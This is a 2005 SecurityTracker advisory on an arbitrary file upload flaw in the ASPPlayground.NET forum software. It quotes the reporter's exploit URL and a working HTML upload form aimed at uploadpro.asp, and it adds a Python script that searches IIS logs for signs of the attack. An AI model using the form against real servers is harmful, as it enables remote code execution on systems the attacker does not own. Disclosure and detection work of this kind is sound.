SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  ASPPlayground.NET
Vendors:  ASPPlayground.NET
ASPPlayground.NET Lets Remote Users Upload Arbitrary Files
SecurityTracker Alert ID:  1014309
SecurityTracker URL:  http://securitytracker.com/id?1014309
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jun 27 2005
Impact:  Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 3.2 SR1
Description:  Psycho from Team-evil moroccain hackers reported a vulnerability in ASPPlayground.NET. A remote user can upload arbitrary files.

A remote user can submit a POST request directly to the 'uploadpro.asp' script to upload files with arbitrary content to the target system.

A demonstration exploit POST action is provided:

http://[target]/[forum]/uploadpro.asp?memori=&deletefile=&mode=

A remote user can upload scripting code and then have the web server invoke the code.

Impact:  A remote user can upload arbitrary code to the target web server and then have the web server execute the code.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.aspplayground.net/
Cause:  Access control error
Underlying OS:  Windows (Any)
Reported By:  Psycho <l8oo8l@gmail.com>
Message History:   None.
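
Since the entry lists no vendor fix, server logs are one place to look for direct use of the upload script. The following is an added example, not part of the advisory or of the vendor's code: it scans IIS W3C logs for POSTs to 'uploadpro.asp' that did not come from the 'post.asp' form, and for script files first requested after such an upload. The log lines, addresses, host name, the 'upfiles' directory and the extension list are constructed assumptions.

```python
import os

UPLOAD_SCRIPT = "/uploadpro.asp"   # upload handler named in the advisory
FORM_PAGE = "/post.asp"            # page the source message gives as the referring form
# Assumption: extensions this server maps to a script engine; adjust to the site.
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".cdx", ".aspx", ".ashx"}

# Constructed sample in IIS W3C extended format (not data from the advisory).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Referer)
2005-06-25 13:40:01 192.0.2.5 GET /forum/default.asp - 200 -
2005-06-25 13:40:09 192.0.2.5 GET /forum/post.asp - 200 http://forum.example/forum/default.asp
2005-06-25 13:40:30 192.0.2.5 POST /forum/uploadpro.asp memori=&deletefile=&mode= 200 http://forum.example/forum/post.asp
2005-06-25 13:40:41 192.0.2.5 GET /forum/upfiles/photo.jpg - 200 -
2005-06-25 13:40:50 192.0.2.5 GET /forum/default.asp - 200 -
2005-06-25 13:42:55 198.51.100.9 POST /forum/uploadpro.asp memori=&deletefile=&mode= 200 -
2005-06-25 13:43:10 198.51.100.9 GET /forum/upfiles/x.asp - 200 -
"""

def parse_w3c(text):
    """Yield one dict per request, taking column names from the #Fields line."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_suspicious(text):
    """Return (rule, client_ip, uri) tuples in log order."""
    findings, seen_paths, uploaders = [], set(), set()
    for req in parse_w3c(text):
        uri, ip = req["cs-uri-stem"].lower(), req["c-ip"]
        if req["cs-method"] == "POST" and uri.endswith(UPLOAD_SCRIPT):
            uploaders.add(ip)
            referer = req.get("cs(Referer)", "-").lower().split("?")[0]
            # Weak signal: the Referer header is client-controlled and can be forged.
            if not referer.endswith(FORM_PAGE):
                findings.append(("upload-without-form", ip, uri))
        elif (ip in uploaders and uri not in seen_paths
              and os.path.splitext(uri)[1] in SCRIPT_EXTS):
            # Stronger signal: a script path nobody requested before this
            # client's upload is now being fetched by the uploader.
            findings.append(("new-script-after-upload", ip, uri))
        seen_paths.add(uri)
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(*finding)
```

On a live server, script paths requested in older logs would need to be treated as already seen, so that rarely visited but legitimate pages are not reported as new.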


 Source Message Contents

Date:  Sat, 25 Jun 2005 13:42:55 +0000
From:  Psycho <l8oo8l@gmail.com>
Subject:  ASP Playground Version beta 3.2 SR1 - Arbitrary File Upload Vulnerability

 
 
 ASP Playground Version beta 3.2 SR1 - Arbitrary File Upload Vulnerability
 
 
 
ASP Playground allows malicious users to
upload and execute arbitrary code by bypassing the JavaScript filter.
 
A vulnerability has been identified in the message post with upload.
 
EXPLOITS :
 
http://www.target.com/forum/uploadpro.asp?memori=&deletefile=&mode=
 
refer to
 
http://www.target.com/forum/post.asp 
 
* 
 
 ASP Playground html bug :
___________________________
 
 <html>
 <head>
 <title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files 
 </title>
 
</table>
<br>
<table width="98%" border="0" cellspacing="0" cellpadding="0">
<form method="POST" action="http://www.target.com/forum/uploadpro.asp?memori=&deletefile=&mode=" enctype="multipart/form-data" onSubmit="return respondToUploader(this)">
<tr>
<td bgcolor="8d5a18">
<table width="100%" border="0" cellspacing="1" cellpadding="4">
<tr>
<td bgcolor="f8fff3"> upload<br>
<input type="file" name="File1" size="22">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<hr size="1" noshade>
</td>
</tr>
<tr>
<td align="right">
<input type="submit" name="submit" value="upload">
</td>
</tr>
</form>
</table>
</body>
<center><b>pOWERED By Team-Evil l8oo8l@gmail.com
</html>
_______________________________________
by Team-evil moroccain hackers



Copyright 2005, SecurityGlobal.net LLC